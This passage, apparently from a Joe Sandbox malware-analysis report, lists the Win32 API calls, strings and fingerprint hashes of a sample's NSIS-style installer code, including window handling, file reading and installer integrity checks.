                                                                                                          • lstrcmpiW.KERNEL32(00432E98,.exe,00432EA0,?,?,?,00432EA0,00000000,0043F800,00441000,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 004039B2
                                                                                                          • GetFileAttributesW.KERNEL32(00432EA0), ref: 004039BD
                                                                                                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,0043F800), ref: 00403A06
                                                                                                            • Part of subcall function 00405F9C: wsprintfW.USER32 ref: 00405FA9
                                                                                                          • RegisterClassW.USER32(00433EA0), ref: 00403A43
                                                                                                          • SystemParametersInfoW.USER32(?,00000000,?,00000000), ref: 00403A5B
                                                                                                          • CreateWindowExW.USER32(?,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403A90
                                                                                                          • ShowWindow.USER32(00000005,00000000), ref: 00403AC6
                                                                                                          • GetClassInfoW.USER32(00000000,RichEdit20W,00433EA0), ref: 00403AF2
                                                                                                          • GetClassInfoW.USER32(00000000,RichEdit,00433EA0), ref: 00403AFF
                                                                                                          • RegisterClassW.USER32(00433EA0), ref: 00403B08
                                                                                                          • DialogBoxParamW.USER32(?,00000000,00403C41,00000000), ref: 00403B27
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2634980867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.2634946801.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635034926.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635057456.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635113538.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                          • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                          • API String ID: 1975747703-1115850852
                                                                                                          • Opcode ID: d5c3abf15ba9808ba33f498f7a164742ef658a4c3e7242e85e78716b4e36e908
                                                                                                          • Instruction ID: 3415ad5ee5f1eed3d2c0e447cb4c4d8a0153f3b0974deb3f023f39c7f2583bdf
                                                                                                          • Opcode Fuzzy Hash: d5c3abf15ba9808ba33f498f7a164742ef658a4c3e7242e85e78716b4e36e908
                                                                                                          • Instruction Fuzzy Hash: A361CA706406006FD320AF66AD46F2B3A6CEB8474AF40553FF941B22E2DB7D5D41CA2D
                                                                                                          APIs
                                                                                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                          • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                          • DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2634980867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.2634946801.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635034926.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635057456.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635113538.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                          • String ID: F
                                                                                                          • API String ID: 941294808-1304234792
                                                                                                          • Opcode ID: 836f1adf353e2d325b24016f8fe56e8870fd4280f6f4b89fbeb337628f0c6723
                                                                                                          • Instruction ID: 6108585e84898fc0a566315ef3a84ca8793ce744416779fac967068cfe9173e2
                                                                                                          • Opcode Fuzzy Hash: 836f1adf353e2d325b24016f8fe56e8870fd4280f6f4b89fbeb337628f0c6723
                                                                                                          • Instruction Fuzzy Hash: 0E418A71800209AFCB058F95DE459AFBBB9FF44310F04842EF991AA1A0C738EA54DFA4
                                                                                                          APIs
                                                                                                          • lstrcpyW.KERNEL32(00430908,NUL,?,00000000,?,0040A300,00405F17,?,?), ref: 00405D93
                                                                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,0040A300,00405F17,?,?), ref: 00405DB7
                                                                                                          • GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 00405DC0
                                                                                                            • Part of subcall function 00405B8F: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9F
                                                                                                            • Part of subcall function 00405B8F: lstrlenA.KERNEL32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD1
                                                                                                          • GetShortPathNameW.KERNEL32(00431108,00431108,00000400), ref: 00405DDD
                                                                                                          • wsprintfA.USER32 ref: 00405DFB
                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 00405E36
                                                                                                          • GlobalAlloc.KERNEL32(?,0000000A,?,?,?,?), ref: 00405E45
                                                                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7D
                                                                                                          • SetFilePointer.KERNEL32(0040A578,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A578,00000000,[Rename],00000000,00000000,00000000), ref: 00405ED3
                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00405EE4
                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405EEB
                                                                                                            • Part of subcall function 00405C2A: GetFileAttributesW.KERNEL32(00000003,00402E2E,00442800,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                                                                                                            • Part of subcall function 00405C2A: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2634980867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.2634946801.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635034926.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635057456.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635113538.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                                                          • String ID: %ls=%ls$NUL$[Rename]
                                                                                                          • API String ID: 222337774-899692902
                                                                                                          • Opcode ID: f6fb36cc51022f7a2fd4840f1f55d7684ca34511e2c34b0b855416ece56c70d0
                                                                                                          • Instruction ID: 58c57230207582c12286da0908ad594a16be4941a6f2872b3690da29fc8d014c
                                                                                                          • Opcode Fuzzy Hash: f6fb36cc51022f7a2fd4840f1f55d7684ca34511e2c34b0b855416ece56c70d0
                                                                                                          • Instruction Fuzzy Hash: 01311370600B18BBD2206B219D49F6B3A5CEF45755F14043AB981F62D2EE7CAA01CAAD
                                                                                                          APIs
                                                                                                          • GetDlgItem.USER32(?,000003FB), ref: 00404603
                                                                                                          • SetWindowTextW.USER32(00000000,?), ref: 0040462D
                                                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 004046DE
                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 004046E9
                                                                                                          • lstrcmpiW.KERNEL32(00432EA0,0042D268,00000000,?,?), ref: 0040471B
                                                                                                          • lstrcatW.KERNEL32(?,00432EA0), ref: 00404727
                                                                                                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404739
                                                                                                            • Part of subcall function 0040577E: GetDlgItemTextW.USER32(?,?,?,00404770), ref: 00405791
                                                                                                            • Part of subcall function 004062E9: CharNextW.USER32(0040A300,*?|<>/":,00000000,0043F000,76F93420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 0040634C
                                                                                                            • Part of subcall function 004062E9: CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 0040635B
                                                                                                            • Part of subcall function 004062E9: CharNextW.USER32(0040A300,0043F000,76F93420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 00406360
                                                                                                            • Part of subcall function 004062E9: CharPrevW.USER32(0040A300,0040A300,76F93420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 00406373
                                                                                                          • GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,?,00000001,0042B238,?,?,000003FB,?), ref: 004047FC
                                                                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404817
                                                                                                            • Part of subcall function 00404970: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,?,000000DF,00000000,00000400,?), ref: 00404A11
                                                                                                            • Part of subcall function 00404970: wsprintfW.USER32 ref: 00404A1A
                                                                                                            • Part of subcall function 00404970: SetDlgItemTextW.USER32(?,0042D268), ref: 00404A2D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2634980867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.2634946801.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635034926.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635057456.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635113538.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                          • String ID: A
                                                                                                          • API String ID: 2624150263-3554254475
                                                                                                          • Opcode ID: 7533d7c2dc95967098a321fa3339fb28748da65ff8be7a50b8b52b895c48c278
                                                                                                          • Instruction ID: 407ae004ccebb682b028ef0dda1631611b85a4c4b0528499d59b6de2b9b5396a
                                                                                                          • Opcode Fuzzy Hash: 7533d7c2dc95967098a321fa3339fb28748da65ff8be7a50b8b52b895c48c278
                                                                                                          • Instruction Fuzzy Hash: 9CA171B1900208ABDB11AFA6CD85AAF77B8EF84314F10843BF601B72D1D77C89418B69
                                                                                                          APIs
                                                                                                          • GetTickCount.KERNEL32 ref: 00402DFF
                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,00442800,?,?,?,00000000,0040353A,?), ref: 00402E1B
                                                                                                            • Part of subcall function 00405C2A: GetFileAttributesW.KERNEL32(00000003,00402E2E,00442800,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                                                                                                            • Part of subcall function 00405C2A: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,00440800,00440800,00442800,00442800,80000000,00000003,?,?,00000000,0040353A,?), ref: 00402E67
                                                                                                          Strings
                                                                                                          • (*B, xrefs: 00402E7C
                                                                                                          • Inst, xrefs: 00402ED3
                                                                                                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00402FC6
                                                                                                          • Error launching installer, xrefs: 00402E3E
                                                                                                          • Null, xrefs: 00402EE5
                                                                                                          • soft, xrefs: 00402EDC
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2634980867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.2634946801.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635034926.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635057456.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635113538.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                          • String ID: (*B$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                          • API String ID: 4283519449-2478819026
                                                                                                          • Opcode ID: af3239711416cc3f4489103c4f5988a16c87e5acef6a1f1d228726abe2e37e97
                                                                                                          • Instruction ID: 7d4f9fc7c678da67c97c1a1890296b71ec8e814f853b941ab64c238268a70fe9
                                                                                                          • Opcode Fuzzy Hash: af3239711416cc3f4489103c4f5988a16c87e5acef6a1f1d228726abe2e37e97
                                                                                                          • Instruction Fuzzy Hash: AF51F731904205ABDB209F61DE89B9F7BB8EB44394F14403BF904B62C1C7B89D409BAD
                                                                                                          APIs
                                                                                                          • GetVersion.KERNEL32(00000000,0042C248,?,004051EB,0042C248,00000000,00000000,?), ref: 0040613A
                                                                                                          • GetSystemDirectoryW.KERNEL32(00432EA0,?), ref: 004061B8
                                                                                                          • GetWindowsDirectoryW.KERNEL32(00432EA0,?), ref: 004061CB
                                                                                                          • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00406207
                                                                                                          • SHGetPathFromIDListW.SHELL32(?,00432EA0), ref: 00406215
                                                                                                          • CoTaskMemFree.OLE32(?), ref: 00406220
                                                                                                          • lstrcatW.KERNEL32(00432EA0,\Microsoft\Internet Explorer\Quick Launch), ref: 00406244
                                                                                                          • lstrlenW.KERNEL32(00432EA0,00000000,0042C248,?,004051EB,0042C248,00000000,00000000,?), ref: 0040629E
                                                                                                          Strings
                                                                                                          • \Microsoft\Internet Explorer\Quick Launch, xrefs: 0040623E
                                                                                                          • Software\Microsoft\Windows\CurrentVersion, xrefs: 00406186
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2634980867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.2634946801.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635034926.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635057456.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635113538.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                          • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                          • API String ID: 900638850-730719616
                                                                                                          • Opcode ID: b49515e533b40e1408f5d93883df29fa5190ace2cf2b8e5a57d609063371b42f
                                                                                                          • Instruction ID: e2b9bd4c7d0941b93a588dc58e8d14d5200dcae9cd5da35c43f1ba43b89dddbc
                                                                                                          • Opcode Fuzzy Hash: b49515e533b40e1408f5d93883df29fa5190ace2cf2b8e5a57d609063371b42f
                                                                                                          • Instruction Fuzzy Hash: 79610371A00504EBDF20AF64CC40BAE37A5AF55324F16817FE942BA2D0D73D9AA1CB4D
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2634980867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.2634946801.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635034926.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635057456.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635113538.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CountTick$wsprintf
                                                                                                          • String ID: jA$ jA$... %d%%
                                                                                                          • API String ID: 551687249-2167919867
                                                                                                          • Opcode ID: e07d926733e31303047b785d6e8e1ef749c31aa3f1888e26d22e6b527b659153
                                                                                                          • Instruction ID: 9abceb1f43df10d1a821086e1d45a58eca4464abfa5f2a46825b956852eb5d51
                                                                                                          • Opcode Fuzzy Hash: e07d926733e31303047b785d6e8e1ef749c31aa3f1888e26d22e6b527b659153
                                                                                                          • Instruction Fuzzy Hash: AF517C71901259EBDB10CF65DA44BAE7BB8AF05766F10417FF811B62C0C7789E40CBAA
                                                                                                          APIs
                                                                                                          • GetWindowLongW.USER32(?,000000EB), ref: 0040419D
                                                                                                          • GetSysColor.USER32(00000000), ref: 004041B9
                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 004041C5
                                                                                                          • SetBkMode.GDI32(?,?), ref: 004041D1
                                                                                                          • GetSysColor.USER32(?), ref: 004041E4
                                                                                                          • SetBkColor.GDI32(?,?), ref: 004041F4
                                                                                                          • DeleteObject.GDI32(?), ref: 0040420E
                                                                                                          • CreateBrushIndirect.GDI32(?), ref: 00404218
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2634980867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.2634946801.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635034926.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635057456.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635113538.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 2320649405-0
                                                                                                          • Opcode ID: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
                                                                                                          • Instruction ID: dec6db0c7b043789455d5ba444b9f0b4b6699da27fefac44a21b5edf9a5b929b
                                                                                                          • Opcode Fuzzy Hash: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
                                                                                                          • Instruction Fuzzy Hash: E321C3B1500704ABCB219F68EE08B4BBBF8AF40710F04896DF996F66A0C734E944CB64
                                                                                                          APIs
                                                                                                          • ReadFile.KERNEL32(?,?,?,?), ref: 0040264D
                                                                                                          • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00000001), ref: 00402688
                                                                                                          • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,?,?,?,00000001), ref: 004026AB
                                                                                                          • MultiByteToWideChar.KERNEL32(?,?,?,00000000,?,00000001,?,00000001,?,?,?,?,?,00000001), ref: 004026C1
                                                                                                            • Part of subcall function 00405D0B: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405D21
                                                                                                          • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040276D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2634980867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.2634946801.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635034926.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635057456.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635113538.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                          • String ID: 9
                                                                                                          • API String ID: 163830602-2366072709
                                                                                                          • Opcode ID: 1e0cadf04f88ccade5697334c954c2e9868fb264b6ac47f65209ed57e79425ed
                                                                                                          • Instruction ID: c11c119823ef092d14edb4d445d1eebecf1e4ba29e3308019af08aa6c5ad61e3
                                                                                                          • Opcode Fuzzy Hash: 1e0cadf04f88ccade5697334c954c2e9868fb264b6ac47f65209ed57e79425ed
                                                                                                          • Instruction Fuzzy Hash: 43510874D00219AADF209F94CA88ABEB779FF04344F50447BE501B72E0D7B99D42DB69
                                                                                                          APIs
                                                                                                          • lstrlenW.KERNEL32(0042C248,00000000,?,76F923A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                          • lstrlenW.KERNEL32(0040318B,0042C248,00000000,?,76F923A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                          • lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,?,76F923A0), ref: 0040520F
                                                                                                          • SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2634980867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.2634946801.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635034926.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635057456.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635113538.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                          • String ID:
                                                                                                          • API String ID: 2531174081-0
                                                                                                          • Opcode ID: 8e6bf81ce48c4b2cdbfca5526b135b5755e0331aa1f53bcdb355af2f73056803
                                                                                                          • Instruction ID: bea5982b108369c56cf3d35f12f42b62494ffc2cb206b3c5387e037ca996873b
                                                                                                          • Opcode Fuzzy Hash: 8e6bf81ce48c4b2cdbfca5526b135b5755e0331aa1f53bcdb355af2f73056803
                                                                                                          • Instruction Fuzzy Hash: B2219D71900518BBCB119FA5DD849DFBFB8EF45354F14807AF944B6290C7794A50CFA8
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A99
                                                                                                          • GetMessagePos.USER32 ref: 00404AA1
                                                                                                          • ScreenToClient.USER32(?,?), ref: 00404ABB
                                                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404ACD
                                                                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AF3
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2634980867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.2634946801.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635034926.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635057456.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635113538.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Message$Send$ClientScreen
                                                                                                          • String ID: f
                                                                                                          • API String ID: 41195575-1993550816
                                                                                                          • Opcode ID: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
                                                                                                          • Instruction ID: 4e6aff0cdf26a8240c2caa3ab5eae10a4373f49143cb0f782fa754f2c80184c8
                                                                                                          • Opcode Fuzzy Hash: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
                                                                                                          • Instruction Fuzzy Hash: AE015E71A40219BADB00DB94DD85FFEBBBCAF55711F10012BBA51B61D0C7B49A058BA4
                                                                                                          APIs
                                                                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402D22
                                                                                                          • MulDiv.KERNEL32(?,?,?), ref: 00402D4D
                                                                                                          • wsprintfW.USER32 ref: 00402D5D
                                                                                                          • SetWindowTextW.USER32(?,?), ref: 00402D6D
                                                                                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D7F
                                                                                                          Strings
                                                                                                          • verifying installer: %d%%, xrefs: 00402D57
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2634980867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.2634946801.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635034926.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635057456.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635113538.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                                                                          • String ID: verifying installer: %d%%
                                                                                                          • API String ID: 1451636040-82062127
                                                                                                          • Opcode ID: afeae77a0bcb9b30cd304cf262a1d5eea60d0cf7f315b1f8058d570c1e4d3d01
                                                                                                          • Instruction ID: 97815700fdd75a8fa64cd4b2fc5eb6b0a03b286ae4c71c47182b2025913274cc
                                                                                                          • Opcode Fuzzy Hash: afeae77a0bcb9b30cd304cf262a1d5eea60d0cf7f315b1f8058d570c1e4d3d01
                                                                                                          • Instruction Fuzzy Hash: 1801447060020DBFEF249F61DE49FEA3B69AB04304F008039FA45B91D0DBB889558F58
                                                                                                          APIs
                                                                                                            • Part of subcall function 00405C2A: GetFileAttributesW.KERNEL32(00000003,00402E2E,00442800,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                                                                                                            • Part of subcall function 00405C2A: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                                                                                                          • GlobalAlloc.KERNEL32(?,?), ref: 00402894
                                                                                                          • CloseHandle.KERNEL32(?), ref: 00402914
                                                                                                            • Part of subcall function 00403258: SetFilePointer.KERNEL32(00000000,00000000,00000000,00402FB5,?,?,?,00000000,0040353A,?), ref: 00403266
                                                                                                          • GlobalAlloc.KERNEL32(?,?,00000000,?), ref: 004028B0
